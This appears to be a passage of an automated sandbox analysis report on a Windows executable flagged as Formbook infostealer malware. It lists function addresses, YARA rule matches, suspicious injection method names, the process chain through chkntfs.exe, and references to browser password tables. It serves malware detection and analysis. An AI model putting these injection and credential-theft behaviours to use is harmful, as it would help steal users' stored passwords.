              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136FCF23_2_0136FCF2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136FF093_2_0136FF09
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136FFB13_2_0136FFB1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B1F923_2_012B1F92
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01273FD53_2_01273FD5
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01273FD23_2_01273FD2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B9EB03_2_012B9EB0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0488E4F614_2_0488E4F6
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0488442014_2_04884420
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489244614_2_04892446
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048A059114_2_048A0591
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E053514_2_047E0535
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047FC6E014_2_047FC6E0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E077014_2_047E0770
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047DC7C014_2_047DC7C0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0480475014_2_04804750
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0487200014_2_04872000
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048A01AA14_2_048A01AA
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048941A214_2_048941A2
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048981CC14_2_048981CC
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047D010014_2_047D0100
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0487A11814_2_0487A118
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0486815814_2_04868158
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048602C014_2_048602C0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0488027414_2_04880274
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048A03E614_2_048A03E6
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047EE3F014_2_047EE3F0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489A35214_2_0489A352
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04880CB514_2_04880CB5
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E0C0014_2_047E0C00
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047D0CF214_2_047D0CF2
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047EAD0014_2_047EAD00
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0487CD1F14_2_0487CD1F
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047DADE014_2_047DADE0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047F8DBF14_2_047F8DBF
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489CE9314_2_0489CE93
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E0E5914_2_047E0E59
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489EEDB14_2_0489EEDB
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489EE2614_2_0489EE26
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047F2E9014_2_047F2E90
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0485EFA014_2_0485EFA0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047ECFE014_2_047ECFE0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04822F2814_2_04822F28
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04800F3014_2_04800F30
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047D2FC814_2_047D2FC8
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04882F3014_2_04882F30
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04854F4014_2_04854F40
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E284014_2_047E2840
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047EA84014_2_047EA840
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0480E8F014_2_0480E8F0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047C68B814_2_047C68B8
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047F696214_2_047F6962
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048AA9A614_2_048AA9A6
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E29A014_2_047E29A0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047DEA8014_2_047DEA80
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04896BD714_2_04896BD7
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489AB4014_2_0489AB40
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047D146014_2_047D1460
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489F43F14_2_0489F43F
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0487D5B014_2_0487D5B0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048A95C314_2_048A95C3
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489757114_2_04897571
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048916CC14_2_048916CC
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0482563014_2_04825630
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489F7B014_2_0489F7B0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0488F0CC14_2_0488F0CC
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048970E914_2_048970E9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489F0E014_2_0489F0E0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E70C014_2_047E70C0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047CF17214_2_047CF172
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047EB1B014_2_047EB1B0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048AB16B14_2_048AB16B
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0481516C14_2_0481516C
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_048812ED14_2_048812ED
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047FB2C014_2_047FB2C0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E52A014_2_047E52A0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0482739A14_2_0482739A
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047CD34C14_2_047CD34C
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489132D14_2_0489132D
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489FCF214_2_0489FCF2
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04859C3214_2_04859C32
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E3D4014_2_047E3D40
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047FFDC014_2_047FFDC0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04891D5A14_2_04891D5A
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04897D7314_2_04897D73
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E9EB014_2_047E9EB0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489FFB114_2_0489FFB1
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489FF0914_2_0489FF09
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A3FD214_2_047A3FD2
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A3FD514_2_047A3FD5
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E1F9214_2_047E1F92
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0484D80014_2_0484D800
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E38E014_2_047E38E0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047E995014_2_047E9950
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047FB95014_2_047FB950
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0487591014_2_04875910
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04825AA014_2_04825AA0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0487DAAC14_2_0487DAAC
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04881AA314_2_04881AA3
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0488DAC614_2_0488DAC6
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489FA4914_2_0489FA49
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04897A4614_2_04897A46
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04853A6C14_2_04853A6C
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_04855BF014_2_04855BF0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0481DBF914_2_0481DBF9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0489FB7614_2_0489FB76
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047FFB8014_2_047FFB80
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005A19A014_2_005A19A0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005BA41014_2_005BA410
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059CB7014_2_0059CB70
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059CB6814_2_0059CB68
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059CD9014_2_0059CD90
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059AE1014_2_0059AE10
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059AF5514_2_0059AF55
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059AFE914_2_0059AFE9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005A34F014_2_005A34F0
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FC11C14_2_045FC11C
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FB18814_2_045FB188
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FBC6714_2_045FBC67
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_045FBD8314_2_045FBD83
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 012F7E54 appears 111 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 0131EA12 appears 86 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 0129B970 appears 277 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 012E5130 appears 58 times
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: String function: 0132F290 appears 105 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04815130 appears 58 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0484EA12 appears 86 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04827E54 appears 111 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0485F290 appears 105 times
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 047CB970 appears 277 times
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1239382924.000000000099E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1241401720.000000000390E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000000.1229629788.00000000003E8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOgps.exe, vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1250425384.0000000006B30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1250744676.00000000072F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000000.00000002.1240108906.0000000002788000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHKNTFS.EXEj% vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.000000000139D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exeBinary or memory string: OriginalFilenameOgps.exe, vs 8hd98EhtIFcYkb8.exe
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: EuOdzX7Ehz6t1H3[1].exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: aj34fjqh.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, A297vOAUIe0qEnXTYd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, A297vOAUIe0qEnXTYd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, A297vOAUIe0qEnXTYd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.8hd98EhtIFcYkb8.exe.28f4678.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: 0.2.8hd98EhtIFcYkb8.exe.68c0000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: 0.2.8hd98EhtIFcYkb8.exe.2915848.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/5@16/14
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8hd98EhtIFcYkb8.exe.logJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMutant created: NULL
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
              Source: C:\Windows\SysWOW64\chkntfs.exeFile created: C:\Users\user~1\AppData\Local\Temp\j77tfG6Jump to behavior
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 8hd98EhtIFcYkb8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
              Source: C:\Windows\SysWOW64\chkntfs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: chkntfs.exe, 0000000E.00000003.1615124311.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3694875633.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1615970676.0000000002A5B000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1615970676.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3694875633.0000000002A5B000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1615187319.0000000002A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 8hd98EhtIFcYkb8.exeReversingLabs: Detection: 28%
              Source: unknownProcess created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess created: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe "C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe"Jump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
